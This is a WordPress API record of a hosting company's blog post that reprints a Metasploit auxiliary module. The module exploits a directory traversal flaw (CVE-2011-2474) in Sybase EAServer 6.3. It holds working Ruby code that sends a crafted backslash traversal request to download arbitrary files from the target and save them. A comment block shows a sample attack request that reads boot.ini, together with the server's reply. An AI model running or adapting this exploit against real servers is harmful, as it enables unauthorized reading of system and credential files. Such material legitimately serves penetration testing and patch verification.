{"id":59353,"date":"2024-09-01T20:29:37","date_gmt":"2024-09-01T17:29:37","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181176\/sybase_easerver_traversal.rb.txt"},"modified":"2024-09-01T20:29:37","modified_gmt":"2024-09-01T17:29:37","slug":"sybase-easerver-6-3-directory-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/sybase-easerver-6-3-directory-traversal\/","title":{"rendered":"Sybase Easerver 6.3 Directory Traversal"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Sybase Easerver 6.3 Directory Traversal’,
‘Description’ => %q{
This module exploits a directory traversal vulnerability found in Sybase
EAserver’s Jetty webserver on port 8000. Code execution seems unlikely with
EAserver’s default configuration unless the web server allows WRITE permission.
},
‘References’ =>
[
[ ‘CVE’, ‘2011-2474’ ],
[ ‘OSVDB’, ‘72498’ ],
[ ‘URL’, ‘http:\/\/www.sybase.com\/detail?id=1093216’ ],
[ ‘URL’, ‘https:\/\/labs.idefense.com\/verisign\/intelligence\/2009\/vulnerabilities\/display.php?id=912’ ],
],
‘Author’ =>
[
‘Sow Ching Shiong’, #Initial discovery (via iDefense)
‘sinn3r’
],
‘License’ => MSF_LICENSE,
‘DisclosureDate’ => ‘2011-05-25’
))<\/p>\n

register_options(
[
Opt::RPORT(8000),
OptString.new(“FILEPATH”, [false, ‘Specify a parameter for the action’])
])
end<\/p>\n

def run_host(ip)
# No point to continue if no filename is specified
if datastore[‘FILEPATH’].nil? or datastore[‘FILEPATH’].empty?
print_error(“Please supply the name of the file you want to download”)
return
end<\/p>\n

print_status(“Attempting to download: #{datastore[‘FILEPATH’]}”)<\/p>\n

# Create request
traversal = “.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..”
res = send_request_raw({
‘method’ => ‘GET’,
‘uri’ => “\/#{traversal}\\\\#{datastore[‘FILEPATH’]}”
}, 25)<\/p>\n

print_status(“Server returns HTTP code: #{res.code.to_s}”)<\/p>\n

# Show data if needed
if res and res.code == 200
vprint_line(res.to_s)
fname = File.basename(datastore[‘FILEPATH’])<\/p>\n

path = store_loot(
‘easerver.http’,
‘application\/octet-stream’,
ip,
res.body,
fname
)
print_status(“File saved in: #{path}”)
else
print_error(“Nothing was downloaded”)
end
end
end<\/p>\n

=begin
GET \/.\\..\\.\\..\\.\\..\\.\\..\\boot.ini HTTP\/1.0
User-Agent: DotDotPwn v2.1 <– yup, awesome tool
Connection: close
Accept: *\/*
Host: 10.0.1.55:8000<\/p>\n

HTTP\/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 07:12:39 GMT
Content-Length: 211
Connection: close
Server: Jetty(EAServer\/6.3.1.04 Build 63104 EBF 18509)<\/p>\n[boot loader]timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS
[operating systems]multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS=”Microsoft Windows XP Professional” \/fastdetect \/NoExecute=OptIn<\/p>\n

$ nc 10.0.1.55 8000
OPTIONS \/ HTTP\/1.0<\/p>\n

HTTP\/1.1 405 Method Not Allowed
Allow: GET
Content-Length: 0
Server: Jetty(EAServer\/6.3.1.04 Build 63104 EBF 18509)
=end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::Reportinclude Msf::Exploit::Remote::HttpClient def initialize(info = {})super(update_info(info,‘Name’ => ‘Sybase Easerver 6.3 Directory Traversal’,‘Description’ => %q{This module exploits a directory traversal vulnerability found in SybaseEAserver’s Jetty webserver on port 8000. Code execution seems unlikely withEAserver’s default configuration unless the web server allows WRITE …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59353","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59353","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59353"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59353\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}